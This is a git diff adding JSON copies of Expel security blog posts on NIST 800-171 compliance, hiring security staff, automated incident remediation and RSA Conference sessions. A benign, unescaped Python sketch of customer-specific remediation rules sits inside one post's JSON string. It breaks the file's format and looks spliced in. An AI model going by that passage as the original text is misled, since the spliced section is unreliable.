If an alert gets moved up in priority when an analyst doesn\u2019t think it should have been, this gives them an opportunity to provide that feedback so we can think about potential future improvements to the model. For example, could we add a new feature that would help with the use case they are questioning? It\u2019s important to continue asking these questions and maintain an open line of communication across teams. Striking a balance between automation and human judgment is key to security operations. This is just one example of how we use automation here at Expel. Want to find out more about how we help our customers spot malicious attacks in PowerShell? Send us a note!" +} \ No newline at end of file diff --git a/reaching-all-the-way-to-your-nist-800-171-compliance.json b/reaching-all-the-way-to-your-nist-800-171-compliance.json new file mode 100644 index 0000000000000000000000000000000000000000..f2c7de01704586d50a469ad0a2651c7e37646e1f --- /dev/null +++ b/reaching-all-the-way-to-your-nist-800-171-compliance.json @@ -0,0 +1,6 @@ +{ + "title": "Reaching (all the way to) your NIST 800-171 compliance ...", + "url": "https://expel.com/blog/reaching-nist-800-171-compliance-goals/", + "date": "Nov 29, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Reaching (all the way to) your NIST 800-171 compliance goals Security operations \u00b7 5 MIN READ \u00b7 BRUCE POTTER \u00b7 NOV 29, 2018 \u00b7 TAGS: Managed security / NIST / Overview / Planning / SOC If you\u2019re a U.S. Department of Defense (DoD) contractor or you do work with GSA or NASA, you\u2019re likely pretty familiar with NIST 800-171. If you\u2019re not a contractor subject to NIST 800-171, congrats, this is one security framework you DON\u2019T need to comply with. You can stop reading, grab a cup of coffee and focus on your NIST Cybersecurity Framework efforts instead. NIST 800-171 has technically been in force since the start of 2018. And while you had to be compliant at the beginning of the year, you\u2019re likely still looking to streamline your compliance and refine controls based on the evolving understanding of what NIST 800-171 means. You\u2019re not alone; NIST even held a workshop on what Controlled Unclassified Information (CUI) is in October. Given that protecting CUI is at the core of NIST 800-171, it\u2019s safe to assume things will be dynamic for some time to come. A brief history of NIST 800-171 In a past life, I was the CISO for a DoD contractor. In particular, I was a CISO at a DoD contractor when the DFAR requirements were announced and we had to start preparing for compliance with NIST 800-171 by the end of 2017. I remember looking at 171 and thinking there were huge chunks of it that we, and most of our peers, had largely under control. Encryption requirements and other architectural security controls were well-traveled ground, and there were lots of vendors with well-tested products to close the compliance gap. But then there were other controls, particularly around monitoring and operations, that weren\u2019t easily solvable with off-the-shelf products. The Defense Industrial Base (DIB), in general, went through a cybersecurity revolution in the early 2010s, after they were hit with a wave of targeted attacks. But there was still a long way to go. Their technology investments needed a commensurate investment in services and people. That\u2019s easier said than done. 
If you\u2019ve ever worked in a professional services company (including defense contractors), you know how hard it is to hire people who can\u2019t bill their time back to customers. Think IT, legal, finance and \u2026 oh yeah \u2026 security. It\u2019d be easier to go climb Kilimanjaro than to stand up a 24\u00d77 SOC. (If you\u2019d like more info on setting up your own SOC, as well as the costs and challenges associated with it, check out our blog post, How much does it cost to build a 24\u00d77 SOC.) Understanding common NIST 800-171 compliance gaps Like it or not, NIST 800-171 spells out a number of operational controls, which are hard to put in place without old-fashioned human beings. And you\u2019ve got to have these controls in place to get your compliance crown (and pass your audit with flying colors). Most of them relate to monitoring. They include: 3.1.12 \u2013 Monitor and control remote access sessions; 3.3.3 \u2013 Review and update logged events; 3.3.5 \u2013 Correlate audit record review, analysis, and reporting processes for investigation and response to indications of unlawful, unauthorized, suspicious, or unusual activity; all of section 3.6 \u2013 Incident response; 3.14.3 \u2013 Monitor system security alerts and advisories and take action in response; 3.14.6 \u2013 Monitor organizational systems, including inbound and outbound communications traffic, to detect attacks and indicators of potential attacks; and 3.14.7 \u2013 Identify unauthorized use of organizational systems. The details of each section are different, but the overall gist of all of these requirements is the same: you need someone to monitor your systems to look for bad things, respond to the bad things and then report on the bad things. The challenge for many organizations is the \u201csomeone\u201d part. Identifying \u201cwho\u201d exactly is going to monitor, respond and report often leads to a bunch of dead ends. While it\u2019s possible to automate a few things with some scripts and shoot texts and emails to IT staff at all hours of the night, that\u2019s not really satisfying (or sustainable). From a compliance perspective, that kind of solution is riding the edge of auditor acceptability. Worse, if you stumble into a reportable incident and your client comes looking to see what happened, solutions like scripts and late-night emails aren\u2019t going to be satisfying to them either. They\u2019re going to wonder why nobody was looking. Closing your compliance gaps without building a SOC If you\u2019re at a professional services company that does government contracting, you\u2019ve made responsible investments in security technology and you\u2019re staring at the 24\u00d77 monitoring requirements in section three of NIST 800-171 wondering what to do, you\u2019re in good company. Building a security operations center (SOC) and hiring a bunch of SOC analysts is about as likely as getting a sole source contract to run every federal network at every agency. So what should you do to get compliant? \u201cBy offloading your security operations to an MSSP, you can address the operational needs of 800-171 relatively quickly.\u201d The most obvious place to look is at managed service providers. By offloading your security operations to an MSSP or a managed detection and response (MDR) provider, you can address the operational needs of NIST 800-171 relatively quickly. Nine times out of \u2026 nine, it\u2019s generally easier to sign a service contract than it is to build your own SOC. But choosing a provider isn\u2019t always straightforward. 
Not all MSSPs and MDRs are created equal, and there are warning signs that an MSSP may not be right for you. However, while we\u2019re admittedly a little biased, we feel that Expel is a great fit for organizations that are trying to get operational support for their NIST 800-171 needs. Here\u2019s why. We use your existing security technology Unlike many other MSSPs and MDRs, we meet our customers where they are. We don\u2019t require you to use a specific endpoint product or a specific SIEM (or even have a SIEM in the first place). We use what you use. Expel supports a large number of security vendors already, and if you use a technology we don\u2019t yet support, let\u2019s chat and see if we can integrate with it. You\u2019ve made your investment in security technology. Let us help you realize more value from that investment. We provide answers, not alerts It\u2019s a little cliche, but it\u2019s really the words we live by here at Expel. When our analysts investigate something and notify you about an incident, it\u2019s actually something you can transact on. Put another way \u2026 you won\u2019t have to do your own analysis to figure out if it\u2019s a \u201creal\u201d alert or determine what the impact might be. We do that for you. Further, we provide you with specific steps you need to take to remediate the issue. Really, you don\u2019t need to think much about your security operations unless we notify you. And when we notify you, you\u2019ll be well armed to deal with the issue at hand. Onboarding is wicked fast! Some MSSPs and MDRs require weeks to months to onboard new customers. There may even be a professional services team that shows up to \u201chelp\u201d the process. Here at Expel, we\u2019ve been focused on making onboarding as easy as possible from day one. We send you a VM, you install it, and then you provide API keys for your various security technologies. We take it from there. Onboarding with Expel is usually measured in hours, with our customers seeing tangible value within the first few days. If you feel like you have a compliance gap you need to close, we can help you close it as fast as you\u2019re willing to move. Our pricing is straightforward Life is too short to spend running around and around with a vendor about pricing. I\u2019ve sat through enough color team meetings and responded to enough RFPs to know how valuable time is (and how infuriating wasted time can be). Here at Expel, we\u2019ve made our pricing straightforward. No hidden costs, no last-minute \u201coh, that\u2019ll be extra.\u201d We collect all the info we need up front to quickly give you the complete breakdown you need. That should make your procurement people happy, which in general makes everyone happy. We\u2019re happy to chat about NIST 800-171 compliance and our service offerings. We\u2019re security nerds like that."
+} \ No newline at end of file diff --git a/recruit-for-team-dauntless.json b/recruit-for-team-dauntless.json new file mode 100644 index 0000000000000000000000000000000000000000..130c3de3f97e2a53721ba26cbeb00a3b666b1590 --- /dev/null +++ b/recruit-for-team-dauntless.json @@ -0,0 +1,6 @@ +{ + "title": "Recruit for team dauntless", + "url": "https://expel.com/blog/recruit-team-dauntless/", + "date": "Oct 25, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Recruit for team dauntless Talent \u00b7 3 MIN READ \u00b7 YANEK KORFF \u00b7 OCT 25, 2017 \u00b7 TAGS: Employee retention / Great place to work / Hiring / Management I was interviewing a not-very-experienced candidate recently. She\u2019d had a number of internships in a variety of technical disciplines, but this was her first full-time role. As I do with many entry-level candidates, I asked what\u2019s known as the \u201cwhat happens when\u2026\u201d question : Question 1 Imagine you\u2019re at your computer, you type \u201cwww.expel.io\u201d into your web browser and hit enter. Tell me, in as much technical detail as you can, what happens next for that page to load. It\u2019s a great assessment question. It\u2019s relatively hard to study for because, as an interviewer, you can keep asking more detailed questions to see where a candidate\u2019s technical depth bottoms out. The candidate can\u2019t really fully prepare for all the directions this conversation can go. This isn\u2019t a game of stump-the-candidate, but instead a way for an interviewer to assess both the breadth and depth of a candidate\u2019s technical knowledge in this area. Our candidate did okay. Her fluency jumping around the OSI reference model implied a pretty good understanding of the network encapsulation and decapsulation process. She hit a lot of the right keywords with respect to HTTP and DNS at layer 7. She covered the handshake aspects of TCP. She even drilled down a bit into layer 2 and was able to articulate how to effectively manage a collision domain. Where things went a little bit sideways was around DNS itself. Whether it was nerves or otherwise, she seemed to struggle separating what was happening in the routing of DNS requests from the contents of those requests and the records that would need to be returned to the DNS queries sent. Overall, the candidate did well given her experience. She demonstrated a sufficient depth of knowledge that implied she\u2019d be able to learn what comes next. After all, without a strong technical foundation, you can\u2019t \u201clearn security.\u201d Your knowledge of how things work at a fundamental level forms a sort of backbone or framework onto which you can attach new things you learn. What\u2019s more, the volume of new things you learn every day in a security role is so high, it\u2019s essential to find people who have a genuine thirst for this knowledge. Some might say candidates have to be really passionate about it . Question 2 Tell me about a time at work, or a project at school that\u2026 thinking back to it, you say to yourself, \u201cIf I could do that every day\u2026 it was so much fun, that would be amazing.\u201d What was this work or project? What made it so great? Turns out, in her most recent internship, our candidate ended up solving a problem that users were having with attachments in Office 365. The process of individually downloading attachments was so cumbersome, people had written their own macros that would automatically download attachments directly to their desktop. 
Needless to say, the security team wasn\u2019t excited about the proliferation of homegrown macros combined with auto-downloads. So, the candidate dove into this problem and built a centralized capability using PowerShell and .NET that provided a safe means of retrieving, scanning, and depositing these attachments in a company-managed file share that met both the security team\u2019s needs and the needs of their user base. Nice work! What\u2019s most interesting is the reason this was her favorite work experience. It\u2019s multi-faceted. Not only did she enjoy solving a real problem that impacted users, she\u2019d never worked with PowerShell or .NET before. Nor had she written anything to interact with Office 365. All in all, it was a tremendous learning experience. Deriving so much pleasure (remember, this was her FAVORITE work experience) from learning new stuff certainly implies the kind of fearlessness that \u201c Team Dauntless \u201d might imply. Still, let\u2019s ask one more question. Question 3 What prompted you to take on this project? Well\u2026 our candidate was hired into a security team that hadn\u2019t had an intern before. They were unprepared. It became quickly clear that there weren\u2019t any clear tasks for her to take on. So, in the absence of guidance she started talking to the members of the team about problems they were facing to get a better lay of the land in search of problems she thought she might be able to take on. As this particular problem emerged, she started brainstorming with members of the team how it might be solved. PowerShell arose early as a potential vector for a solution, so she taught herself over the course of a couple weeks. As more nuanced needs arose, she continued to seek guidance from more senior members of the team and, coupled with her own independent research, eventually arrived at the solution she finally rolled out. The textbook definition of dauntless is \u201cfearlessness and determination.\u201d I can\u2019t think of a story that better exemplifies these behaviors in a candidate and I\u2019m really looking forward to this particular candidate joining our team. When you\u2019re interviewing the next member of your security team \u2013 consider this question. Do they display the qualities of fearlessness and determination that will drive them to achieve great things in your organization? Look for this, and you won\u2019t be disappointed with the outcome. \u2014 This is the fourth part of a five part series on key areas of focus to improve security team retention.Read from the beginning, 5 ways to keep your security nerds happy , or continue to part five ." 
+} \ No newline at end of file diff --git a/remediation-should-be-automated-and-customized.json b/remediation-should-be-automated-and-customized.json new file mode 100644 index 0000000000000000000000000000000000000000..9af03ed0e74917878205f2170aa3903ae4a712ea --- /dev/null +++ b/remediation-should-be-automated-and-customized.json @@ -0,0 +1,6 @@ +{ + "title": "Remediation should be automated\u2014and customized", + "url": "https://expel.com/blog/remediation-should-be-automated-and-customized/", + "date": "Oct 13, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Remediation should be automated\u2014and customized Security operations \u00b7 3 MIN READ \u00b7 PETER SILBERMAN \u00b7 OCT 13, 2022 \u00b7 TAGS: MDR Here at Expel, we talk an awful lot about remediation, and with good reason: effective remediation of cybersecurity incidents is critical for our customers\u2019 business and our own. Getting to the fix quickly is fine, but when done properly, the organization realizes a host of additional benefits. Customer control During an active incident, remediation reduces an organization\u2019s risk, but customer control of that process is absolutely essential. It\u2019s also important to understand that remediation isn\u2019t \u201call-or-nothing.\u201d Many providers in the marketplace sell a cookie-cutter, full-remediation approach, but organizations should have the option to provide context specific to their business, technology, risk tolerance, policies, and general comfort level, allowing them to dictate when to remediate and when not to. (Any number of factors can contribute to that comfort zone, including internal policies, familiarity with the vendor, lingering aches and pains from bad past experiences\u2014we get it. For example, you don\u2019t want a third party to isolate hosts during an incident? That\u2019s fine. A good provider can still disable compromised user accounts without isolating hosts.) The platform itself should know the rules and preferences of the customer; this ensures consistency and scale and ensures security operation center (SOC) analysts don\u2019t have to pass around sticky-notes reminding them to remediate a certain way for customer A, but not customer B, for example. A security operations platform that\u2019s context-aware and customizable allows the client organization to: Reduce risk by allowing automated remediation steps the moment an issue is detected; Reduce fatigue and burnout (why wake a customer analyst at 2 am to disable an account when the system can do it for you?); and Keep customer analysts focused on more important work\u2013what does the business deem important? Automated remediation\u2019s breathtaking benefits In our Quarterly Threat Report for Q2 , we noted that the median time to complete a non-automated remediation action was two hours. When automated, the median time drops to seven minutes\u2014a 1640% improvement. Regardless of whether they opt for automated remediation, organizations should insist on comprehensive reporting that includes remediation steps as part of the investigative process. Vendors can (and should) always recommend remediation actions, even if that vendor isn\u2019t going to take the steps themselves. A deeper look at the numbers suggests the benefits of automated remediation may be even greater for the customer. In Q2 2022: We had 3,378 remediation actions (RA) that were manual. ~30% of incidents had more than one remediation action , compounding the time savings. 
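To make the "customer control" idea concrete, here is a minimal sketch of per-customer auto-remediation preferences, assuming a simple in-memory rules table. The action types mirror the examples in this post, but the customer IDs, rule values and function names are hypothetical and not Expel Workbench's actual implementation.

```python
# Minimal sketch of customer-scoped auto-remediation preferences -- illustrative only.
# Customer IDs and the rules table are hypothetical; action types mirror the post.
from enum import Enum, auto


class Action(Enum):
    ISOLATE_HOST = auto()
    DISABLE_ACCOUNT = auto()
    REMOVE_EMAIL = auto()
    BLOCK_HASH = auto()


# Per-customer preferences: which actions the provider may take automatically.
CUSTOMER_PREFERENCES = {
    "customer-a": {Action.DISABLE_ACCOUNT, Action.REMOVE_EMAIL, Action.BLOCK_HASH},
    "customer-b": {Action.ISOLATE_HOST, Action.DISABLE_ACCOUNT},
}


def handle_incident(customer_id: str, proposed_actions: list[Action]) -> dict:
    """Auto-run only what the customer has opted into; recommend the rest to a human."""
    allowed = CUSTOMER_PREFERENCES.get(customer_id, set())
    automated = [a for a in proposed_actions if a in allowed]
    recommended = [a for a in proposed_actions if a not in allowed]
    return {"automated": automated, "recommended_to_customer": recommended}


if __name__ == "__main__":
    # customer-a has not opted into host isolation, so that action is only recommended,
    # while the compromised account is disabled automatically.
    result = handle_incident("customer-a", [Action.ISOLATE_HOST, Action.DISABLE_ACCOUNT])
    print(result)
```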
Let\u2019s take a look at what autoremediation looks like in our Workbench environment. Here\u2019s what it looks like in Slack: Many actions can be automated, including (but not limited to) host containment, disabling a user account, removing suspicious emails, or blocking a known bad hash. Customers can also decide what resources Expel can remediate on their behalf. As mentioned above, this is far from a cookie-cutter approach. Raspberry Robin/Evil Corp incident: huge time savings Raspberry Robin, a widespread USB-based worm that acts as a loader for other malware, has significant similarities to the Dridex malware loader, meaning that it can be traced back to the sanctioned Russian ransomware group Evil Corp. (Source: DarkReading ) This past June a CrowdStrike alert hit our queue that related to msiexec launching with unusual arguments on a customer host. Our team identified this as activity consistent with the installation of a variant of the Raspberry Robin Worm malware family attributed to Evil Corp. Using CrowdStrike\u2019s APIs, it took our analysts 5.5 minutes to progress from the alert hitting the queue to containing the host and stopping the ransomware. When the stakes are high, there\u2019s no time to waste in remediating. Autoremediation: it\u2019s your call Automated remediation should be tailored to your organization and based on the frequency of threats seen in your environment. The customer decides which users and endpoints should be immediately taken offline after a compromise is confirmed. This allows the security team to focus on other initiatives instead of spending a ton of time on remediation. As businesses think about managed detection and response (MDR) and reducing risk, considering offloading some of this costly work to a trusted provider is hopefully front-of-mind. It\u2019s also useful to understand the unique context of the organization, which includes business goals, existing technology, even corporate culture, and to talk with your provider about it. Want to learn more about Expel\u2019s approach to automated remediation? You can read more about it here ." +} \ No newline at end of file diff --git a/rsa-conference-day-2-inclusivity-is-the-goal.json b/rsa-conference-day-2-inclusivity-is-the-goal.json new file mode 100644 index 0000000000000000000000000000000000000000..8aa8be489aba025cab1dbf4212dbbe3e057609d2 --- /dev/null +++ b/rsa-conference-day-2-inclusivity-is-the-goal.json @@ -0,0 +1,6 @@ +{ + "title": "RSA Conference Day 2: Inclusivity is the Goal", + "url": "https://expel.com/blog/rsa-conference-day-2-inclusivity-is-the-goal/", + "date": "Jun 8, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG RSA Conference Day 2: Inclusivity is the Goal Expel insider \u00b7 2 MIN READ \u00b7 ANDY RODGER \u00b7 JUN 8, 2022 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools Day two of RSA Conference is now in the rearview. We heard about nations around the world that present significant cyber threats and learned how the security operations center (SOC) is moving to be more autonomous. We also got some clarity on a few hot-button topics, like cryptocurrency, non-fungible tokens (NFTs), quantum computing, machine learning (ML), and artificial intelligence (AI) from the esteemed participants of the Cryptographers\u2019 Panel. 
But one session was particularly notable for Expletives and our customers alike, and that was Innovation, Ingenuity, and Inclusivity: The Future of Security is Now , presented by Vasu Jakkal, Corporate Vice President for Microsoft Security, Compliance, Identity Management and Privacy. In cybersecurity, we try to balance our time between considering the threats and attack strategies most likely to impact us today, while also looking ahead to the potential attacks of the future. Jakkal\u2019s perspective is that the threats of tomorrow exist today; they\u2019ll simply be more pervasive tomorrow. To stay ahead of this evolution, the industry\u2019s collective approach must also evolve. How? Through technological innovation, human ingenuity and expertise, and\u2014arguably most importantly\u2014inclusivity in our defender community. It\u2019s no secret that the cybersecurity industry struggles with attracting and retaining talent. Jakkal shared a few statistics: 1 in 3 security jobs in the US is vacant 24% of the global cybersecurity workforce is made up of women 20% of the global cybersecurity workforce is made up of people of color One way to overcome this challenge, Jakkal argues, is to create a more inclusive environment where people from many different backgrounds are empowered to do their best work and thrive. This is a sentiment we echo at Expel. We know we\u2019re \u201cbetter when different.\u201d We\u2019re a stronger organization when we recognize, celebrate, and learn from those whose backgrounds and perspectives are different from our own. We\u2019re committed to creating a safe place where any form of racism and discrimination is addressed and dismantled so everyone is treated with kindness and equality. This is rooted in our core belief that if we take care of our crew, they\u2019ll take care of our customers. We\u2019re on a journey to hire and develop people from underrepresented groups \u2014 Women, Black, Latinx, Indigenous, Multiracial, LGBTQ+, People with Disabilities, and Veterans \u2014 and to create a company that\u2019s as diverse as the countries in which we work and live. (By the way, we\u2019re hiring .) Jakkal offered up some of her own ideas for breaking down the barriers of entry to the defender community (and we couldn\u2019t agree with these more): Eliminate college degree and length of experience requirements for defenders Mobilize community colleges to help grow and diversify our workforce Change the language of cybersecurity to be about optimism and hope, rather than fear, uncertainty, and doubt (FUD) Throughout her session, Jakkal presented a number of great ideas and concepts that we feel all cybersecurity organizations should research and implement. But there was one line she said in passing that was, to us, the most important takeaway for the audience: Cybersecurity is for everyone. It\u2019s a simple phrase, but a powerful one. If you\u2019d like to learn more about how Expel practices equity, diversity, and inclusion on a day-to-day basis, visit this page ." 
+} \ No newline at end of file diff --git a/rsa-conference-day-2-recap-generative-ai-emerges-as.json b/rsa-conference-day-2-recap-generative-ai-emerges-as.json new file mode 100644 index 0000000000000000000000000000000000000000..21c513ae056773f0b12c98b2ffa4b0857d641889 --- /dev/null +++ b/rsa-conference-day-2-recap-generative-ai-emerges-as.json @@ -0,0 +1,6 @@ +{ + "title": "RSA Conference day 2 recap: generative AI emerges as ...", + "url": "https://expel.com/blog/rsa-conference-day-2-recap-generative-ai-emerges-as-the-events-unofficial-theme/", + "date": "Apr 26, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG RSA Conference day 2 recap: generative AI emerges as the event\u2019s unofficial theme Expel insider \u00b7 2 MIN READ \u00b7 ANDY RODGER \u00b7 APR 26, 2023 \u00b7 TAGS: Company news \u201cStronger Together\u201d may be the official theme of RSA Conference 2023, but generative artificial intelligence (AI) has officially emerged as the unofficial theme this year. Conference sessions from keynotes to breakouts alike all seem to include some reference to generative AI (specifically ChatGPT) and the impact it could have on cybersecurity. While some talks showcase the forms it could take\u2013like how RSA CEO Rohit Ghai introduced a generative AI during his keynote and asked it what a unified identity platform should include, or Trellix CEO Brian Palma kicking off his presentation with a deepfake doppelganger demanding a ransom speaking fee to appear live\u2013other talks examined how AI is a two-sided coin. One side shows the havoc AI could wreak, and the other takes a more hopeful tone, focusing on how defenders can wield it for good. In the panel, Who Says Cybersecurity Can\u2019t Be Creative? , Daniel Trauner of Axonius regularly uses AI to get insights about the audiences his content will reach so he can better tailor his content and messages. In the same session, Chris Cochran of Hacker Valley Media said he uses ChatGPT to simplify complex topics for his podcast and web series audiences. Despite generative AI staking a claim for the unofficial theme of RSA Conference 2023, Vasu Jakkal of Microsoft Security masterfully combined the AI topic with the \u201cStronger Together\u201d ethos in her presentation, Defending at Machine Speed: Technology\u2019s New Frontier . (Eagle-eyed readers may remember that we highlighted one of Jakkal\u2019s presentations in our RSA Conference recaps in 2022, found here .) Like many other speakers, she argued that in cybersecurity, the concern shouldn\u2019t be about what technology can do but rather what people can accomplish when they harness technology. Jakkal provided the crowd with a brief history lesson on industrial revolutions, starting with the invention of the steam engine in 1750 and culminating in the AI revolution that started in 2022\u2014and has accelerated since. Jakkal argued that this acceleration means 2023 represents an inflection point for AI, but achieving security-specific AI requires the combination of AI, hyperscale data, and threat intelligence. The resulting security-specific AI models will tilt the scale in favor of defenders. But how? First, it will simplify the art and science of defending. AI will handle a lot of the repetitive, manual tasks often assigned to \u200clevel 1 security operations center (SOC) analysts. Frankly, this was refreshing to hear. 
Not only is it good news for SOC teams, but it\u2019s also something we at Expel have been saying for some time (and doing with our friendly detection and response bots, Josie\u2122 and Ruxie\u2122). Our founders started Expel with the goal of solving people challenges with a technology-forward approach. Next, AI will shape a new paradigm of productivity. It will help usher in new generations of talent into the cybersecurity workforce, and it will help guide people on their learning paths, allowing them to uplevel their skills. This could provide much-needed relief for the well-known cybersecurity talent gap. Finally, and perhaps most importantly, AI has the potential to break barriers for diversity and inclusion in security. When applied correctly, it provides equity and gives everyone\u2013regardless of their differences\u2013the same access to information to help them do their jobs effectively. Jakkal cautions, however, that this doesn\u2019t happen by accident. If AI is exposed to only certain sources of information, it will incorporate unconscious bias into its answers. So the cybersecurity community must make a real effort to encourage diverse use of the tool. She encouraged everyone to engage and prompt these large language models (LLMs) to ensure the community feeds it a diversity of thoughts and experiences. Jakkal ended her presentation pointing out that AI has the potential to be the most consequential technology of our lifetimes, but it will need all of us to make it stronger, together." +} \ No newline at end of file diff --git a/rsa-conference-day-3-impressions-from-the-show-floor.json b/rsa-conference-day-3-impressions-from-the-show-floor.json new file mode 100644 index 0000000000000000000000000000000000000000..9089f781673e4384442f1071588bfc4f9404cdb7 --- /dev/null +++ b/rsa-conference-day-3-impressions-from-the-show-floor.json @@ -0,0 +1,6 @@ +{ + "title": "RSA Conference Day 3: Impressions From the Show Floor", + "url": "https://expel.com/blog/rsa-conference-day-3-impressions-from-the-show-floor/", + "date": "Jun 9, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG RSA Conference Day 3: Impressions From the Show Floor Expel insider \u00b7 3 MIN READ \u00b7 ANDY RODGER \u00b7 JUN 9, 2022 \u00b7 TAGS: Cloud security / Company news / MDR / Tech tools As the largest cybersecurity event in the world, RSA Conference serves up an agenda that provides something for everyone. No matter what cybersecurity area an attendee is interested in, there\u2019s likely to be a keynote or session that addresses it, as well as at least a handful of vendors competing in that area. The wide range of topics covered at a show like RSA Conference makes it nearly impossible for a single theme to rise above the rest and be the talk of the show. So we talked to a few folks who\u2019ve spent time on the show floor about the things they\u2019ve found most interesting, and the trends they\u2019re paying the most attention to at this year\u2019s conference. Here\u2019s what they had to say: What\u2019s the most interesting thing you\u2019ve noticed from the show floor? The main thing is that the human connection is more apparent and more visceral than I was expecting. 
I\u2019ve been coming to RSA Conference for a while, and normally it\u2019s the standard thing: you\u2019re an agent of the company, talking to another person who\u2019s an agent of the company, and there\u2019s a lot of \u2018synergies being leveraged\u2019 and corporate speak, and everyone\u2019s wearing a blazer\u2026 That\u2019s kind of hollow. But then you go away for a few years and realize you actually miss these people and the human connection comes back. I\u2019m seeing old friends, and it puts a whole different spin on what\u2019s going on here \u2014 which is super cool. \u2013 Matt Peters, Chief Product Officer of Expel I\u2019m happy to be back in person because of how small and tight-knit the security industry is. It\u2019s fun seeing everyone again. \u2013 Chris Dobrec, Vice President of Solutions for Armis ( a partner of Expel ) To be honest, the number of participants. I was a bit skeptical of the turn-out and I\u2019m pleasantly surprised that I was completely wrong about it. And more importantly, the folks that are showing up \u2014 even though the numbers are not as high as they\u2019ve been in the past \u2014 are coming in with very specific questions and interests. So the quantity may not be there, but the quality is. \u2013 Oscar Miranda, Field Chief Technology Officer of Healthcare for Armis One thing that stands out is the size of this conference. It\u2019s very obvious that this is a booming space, and there\u2019s so much opportunity for companies to do well in niche markets. Whether it\u2019s one specific supply chain area or workload protection, whatever, there\u2019s something for everybody here. \u2013 Adam Mikula, Sales Development Team Lead for Aqua Security What\u2019s a trend you find most compelling from this year\u2019s conference? I think that the XDR [extended detection and response] trend is compelling\u2026 Not because XDR\u2019s a new thing, but I think everyone is waking up to a fundamental concept about the way that security works. When they\u2019re talking about XDR, people are talking about the ability to do high-quality response \u2014 stitching together a whole bunch of things and actually empowering people to do high-quality investigations. As long as the vendors don\u2019t grab that and change it to suit their own purposes, I think the result will be improved security technology. \u2013 Matt Peters From a technology perspective, [I\u2019m seeing] the emphasis on risk, the emphasis on threat detection and response, different categories starting to come together \u2014 like XDR coming together as an amalgamation of endpoint security and SIEM, and a whole variety of things, to be a wholesale offering. That\u2019s starting to deliver on the promise (so-to-speak) that we\u2019ve been talking about with XDR for a long time. \u2013 Chris Dobrec There\u2019s a lot of consolidation, starting with overlap. A lot of these vendors \u2014 no matter what particular area within cybersecurity they\u2019ve traditionally been focused on \u2014 have expanded their functionality, which I predict is going to result in more consolidation amongst vendors and platforms. So, functionality that you would normally see in one type of technology, now you\u2019re going to see it across others. \u2013 Oscar Miranda Supply chain and shifting even further left has been a pretty consistent message. Attackers are getting smarter and code is getting even more complicated. 
You want to figure it out early, secure it early, and prevent it early, so you don\u2019t have problems later on. \u2013 Adam Mikula From these conversations, it sounds like XDR is now a part of the vernacular that isn\u2019t going away \u2014 it\u2019s time to get comfortable with what it means for both individual organizations, and the industry as a whole. Another undeniable theme? People are happy to be back in person, swapping stories and lessons learned with friends; old and new. We still have some fun planned as we head into the home stretch of the conference. Stop by our booth (S649) for pics with our friendly bots, Josie\u2122 and Ruxie\u2122, and load up on swag (if you still have room); we\u2019ll see you there ." +} \ No newline at end of file diff --git a/rsa-conference-day-3-recap-we-re-solving-people-problems.json b/rsa-conference-day-3-recap-we-re-solving-people-problems.json new file mode 100644 index 0000000000000000000000000000000000000000..5f830bd9529cc4464363fcb61c1794555d29cbcb --- /dev/null +++ b/rsa-conference-day-3-recap-we-re-solving-people-problems.json @@ -0,0 +1,6 @@ +{ + "title": "RSA Conference day 3 recap: we're solving people problems", + "url": "https://expel.com/blog/rsa-conference-day-3-recap-were-solving-people-problems/", + "date": "Apr 27, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG RSA Conference day 3 recap: we\u2019re solving people problems Expel insider \u00b7 2 MIN READ \u00b7 ANDY RODGER \u00b7 APR 27, 2023 \u00b7 TAGS: Company news Whether RSA Conference 2023 attendees know it or not, we\u2019ve come together this week to solve people problems. It\u2019s easy to think of cyber criminals as a faceless, nebulous mass, but in reality they\u2019re just people using technology for nefarious means. The millions of open cybersecurity positions signal recruiting shortcomings and lack of clarity for people who might be interested in security careers. Artificial intelligence (AI) is on everyone\u2019s mind, but even that conversation focuses on how generative AI brings people closer to technology than previously imaginable. At the core, these are people problems. No matter the session topics or the booth messaging, many RSA attendees aim to arm defenders with the resources they need to protect their orgs and customers from cyberthreats. But what are those resources? The first answer that comes to mind might be new tools, or more advanced technology, but the right answer is teamwork. No matter what technology we use, we can\u2019t protect our organizations alone. It takes a village. Many sessions throughout this year\u2019s program focused on exactly this. When the CISOs of the NBA, NHL, and NFL joined a panel to discuss how they protect major sports leagues and high-profile athletes, they emphasized how they collaborate and share their challenges, best practices, lessons learned, and actual security intelligence. According to Ahmed Al Hammadi of the National Cybersecurity Agency in Qatar, securing the 2022 FIFA World Cup\u2014the largest sporting event in the world\u2014was only possible through close collaboration between the Qatari government, cybersecurity and technology consultants, vendors, and other subject matter experts. He emphasized the importance of public-private partnerships to defend against cyber attacks related to these events, and, in the same vein, he committed to working closely with the 2026 event organizers when it\u2019s held in North America. 
In their outstanding session, Strengthening Cybersecurity Through Inclusion , Camille Stewart Gloster of the White House Office of the National Cyber Director and Rob Duhart, Jr. of Walmart, talked about how security teams need to comprise diverse voices and backgrounds. They noted, \u201cdiversity is a deterrent,\u201d and \u201cwe underestimate the adversary when we build homogenous teams.\u201d Even the sessions that weren\u2019t all about security stressed the importance of community and collaboration. Eric Idle of Monty Python fame\u2014after admitting that he knows nothing about security\u2014noted that the five members of the troupe wrote every word for their shows, movies, albums, and more. He said that while the different members would go off and write in small groups, they\u2019d come together to present their ideas to the whole group, and if everyone laughed, they used it. He even talked about how George Harrison of The Beatles financed the production of Monty Python\u2019s The Life of Brian after initial funding was pulled. Harrison mortgaged his home for the cash needed to make the movie. Sometimes, even Monty Python needs a little help from their friends. (Sidebar: when Idle asked Harrison why he wanted to pay for the production, Harrison simply told him that he wanted to see the movie.) We all need the support of the community if we\u2019re going to win this cybersecurity battle. We can solve the shortage of cybersecurity talent, figure out the best ways to apply generative AI, and build diverse teams better equipped to fight the good fight. But there\u2019s only one way forward to solve the most important challenges facing our industry, and that\u2019s together." +} \ No newline at end of file diff --git a/rsa-conference-keynote-kickoff-what-it-means-to-be.json b/rsa-conference-keynote-kickoff-what-it-means-to-be.json new file mode 100644 index 0000000000000000000000000000000000000000..31b54ce82aafa0b9b3989d64a9c5e57f1d05b80a --- /dev/null +++ b/rsa-conference-keynote-kickoff-what-it-means-to-be.json @@ -0,0 